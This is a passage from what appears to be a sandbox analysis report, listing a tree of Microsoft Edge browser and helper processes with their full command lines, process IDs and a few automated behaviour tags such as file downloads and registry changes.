  PID:1616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5552,i,4103189269767145780,2086324193674118960,262144 --variations-seed-version --mojo-platform-channel-handle=5540 /prefetch:14
  2⤵
  PID:1140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5816,i,4103189269767145780,2086324193674118960,262144 --variations-seed-version --mojo-platform-channel-handle=5584 /prefetch:14
  2⤵
  PID:3040
- - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.exe
    cookie_exporter.exe --cookie-json=1140
    3⤵
    PID:6004
- C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5820,i,4103189269767145780,2086324193674118960,262144 --variations-seed-version --mojo-platform-channel-handle=5952 /prefetch:14
  2⤵
  PID:1916
- C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5820,i,4103189269767145780,2086324193674118960,262144 --variations-seed-version --mojo-platform-channel-handle=5952 /prefetch:14
  2⤵
  PID:3728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5480,i,4103189269767145780,2086324193674118960,262144 --variations-seed-version --mojo-platform-channel-handle=4720 /prefetch:14
  2⤵
  PID:5736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4804,i,4103189269767145780,2086324193674118960,262144 --variations-seed-version --mojo-platform-channel-handle=6264 /prefetch:14
  2⤵
  PID:6072
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6464,i,4103189269767145780,2086324193674118960,262144 --variations-seed-version --mojo-platform-channel-handle=5964 /prefetch:14
  2⤵
  PID:3572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5664,i,4103189269767145780,2086324193674118960,262144 --variations-seed-version --mojo-platform-channel-handle=5648 /prefetch:14
  2⤵
  PID:5096
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4736,i,4103189269767145780,2086324193674118960,262144 --variations-seed-version --mojo-platform-channel-handle=6456 /prefetch:14
  2⤵
  PID:3668
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5324,i,4103189269767145780,2086324193674118960,262144 --variations-seed-version --mojo-platform-channel-handle=3768 /prefetch:14
  2⤵
  PID:5804
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --always-read-main-dll --field-trial-handle=5308,i,4103189269767145780,2086324193674118960,262144 --variations-seed-version --mojo-platform-channel-handle=6524 /prefetch:1
  2⤵
  PID:3892
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6152,i,4103189269767145780,2086324193674118960,262144 --variations-seed-version --mojo-platform-channel-handle=6156 /prefetch:14
  2⤵
  - NTFS ADS
  PID:2492
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6796,i,4103189269767145780,2086324193674118960,262144 --variations-seed-version --mojo-platform-channel-handle=6808 /prefetch:14
  2⤵
  PID:5964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5724,i,4103189269767145780,2086324193674118960,262144 --variations-seed-version --mojo-platform-channel-handle=5564 /prefetch:14
  2⤵
  PID:3716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6804,i,4103189269767145780,2086324193674118960,262144 --variations-seed-version --mojo-platform-channel-handle=6348 /prefetch:14
  2⤵
  PID:4916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5144,i,4103189269767145780,2086324193674118960,262144 --variations-seed-version --mojo-platform-channel-handle=5164 /prefetch:14
  2⤵
  PID:3860
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=5356,i,4103189269767145780,2086324193674118960,262144 --variations-seed-version --mojo-platform-channel-handle=5864 /prefetch:10
  2⤵
  PID:3092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3320,i,4103189269767145780,2086324193674118960,262144 --variations-seed-version --mojo-platform-channel-handle=3392 /prefetch:14
  2⤵
  PID:2044
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --always-read-main-dll --field-trial-handle=3284,i,4103189269767145780,2086324193674118960,262144 --variations-seed-version --mojo-platform-channel-handle=2408 /prefetch:1
  2⤵
  PID:2836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6052,i,4103189269767145780,2086324193674118960,262144 --variations-seed-version --mojo-platform-channel-handle=5544 /prefetch:14
  2⤵
  PID:2628
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --always-read-main-dll --field-trial-handle=6072,i,4103189269767145780,2086324193674118960,262144 --variations-seed-version --mojo-platform-channel-handle=6312 /prefetch:1
  2⤵
  PID:2464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5024,i,4103189269767145780,2086324193674118960,262144 --variations-seed-version --mojo-platform-channel-handle=5208 /prefetch:14
  2⤵
  PID:5260
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=5440,i,4103189269767145780,2086324193674118960,262144 --variations-seed-version --mojo-platform-channel-handle=6336 /prefetch:1
  2⤵
  PID:4644
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --always-read-main-dll --field-trial-handle=2968,i,4103189269767145780,2086324193674118960,262144 --variations-seed-version --mojo-platform-channel-handle=1044 /prefetch:1
  2⤵
  PID:2448
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=3280,i,4103189269767145780,2086324193674118960,262144 --variations-seed-version --mojo-platform-channel-handle=6412 /prefetch:1
  2⤵
  PID:3048
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
  2⤵
  - Drops file in Windows directory
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Modifies registry class
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:5824
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x2b0,0x7fff6ae9f208,0x7fff6ae9f214,0x7fff6ae9f220
    3⤵
    PID:4508
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1844,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=2116 /prefetch:11
    3⤵
    - Downloads MZ/PE file
    PID:2648
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2080,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=2076 /prefetch:2
    3⤵
    PID:8
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2516,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=2540 /prefetch:13
    3⤵
    PID:2144
- - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4340,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=4396 /prefetch:14
    3⤵
    PID:3480
- - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4340,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=4396 /prefetch:14
    3⤵
    PID:1012
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4592,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=4600 /prefetch:14
    3⤵
    PID:1192
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=4812,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=4844 /prefetch:1
    3⤵
    PID:756
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4848,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=4876 /prefetch:1
    3⤵
    PID:3148
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5404,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=5412 /prefetch:14
    3⤵
    PID:2136
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5420,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=5448 /prefetch:14
    3⤵
    PID:468
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=6104,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=6080 /prefetch:1
    3⤵
    PID:324
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --always-read-main-dll --field-trial-handle=6096,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=6108 /prefetch:1
    3⤵
    PID:856
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --always-read-main-dll --field-trial-handle=5400,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=6680 /prefetch:1
    3⤵
    PID:1140
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=568,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=6880 /prefetch:14
    3⤵
    PID:2792
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6588,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=6564 /prefetch:14
    3⤵
    PID:4904
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6560,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=5896 /prefetch:14
    3⤵
    PID:4760
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6648,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=6356 /prefetch:12
    3⤵
    PID:1728
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --always-read-main-dll --field-trial-handle=2004,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=6872 /prefetch:1
    3⤵
    PID:5380
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --always-read-main-dll --field-trial-handle=6524,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=6308 /prefetch:1
    3⤵
    PID:4920
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4152,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=1976 /prefetch:14
    3⤵
    PID:5948
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6668,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=5148 /prefetch:14
    3⤵
    PID:4808
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --always-read-main-dll --field-trial-handle=5352,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=5596 /prefetch:1
    3⤵
    PID:1440
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --always-read-main-dll --field-trial-handle=5608,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=6296 /prefetch:1
    3⤵
    PID:5988
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=7228,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=7204 /prefetch:1
    3⤵
    PID:1372
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7356,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=7160 /prefetch:14
    3⤵
    PID:660
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4912,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=7280 /prefetch:14
    3⤵
    PID:872
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=6684,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=7164 /prefetch:10
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:6060
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=7388,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=7436 /prefetch:1
    3⤵
    PID:2176
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7524,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=7604 /prefetch:14
    3⤵
    PID:4420
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --always-read-main-dll --field-trial-handle=7580,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=7320 /prefetch:1
    3⤵
    PID:5084
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=2472,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=1028 /prefetch:14
    3⤵
    - Modifies registry class
    PID:5812
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6380,i,18179480778190120379,9593800299660845894,262144 --variations-seed-version --mojo-platform-channel-handle=7376 /prefetch:14
    3⤵
    PID:2152
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
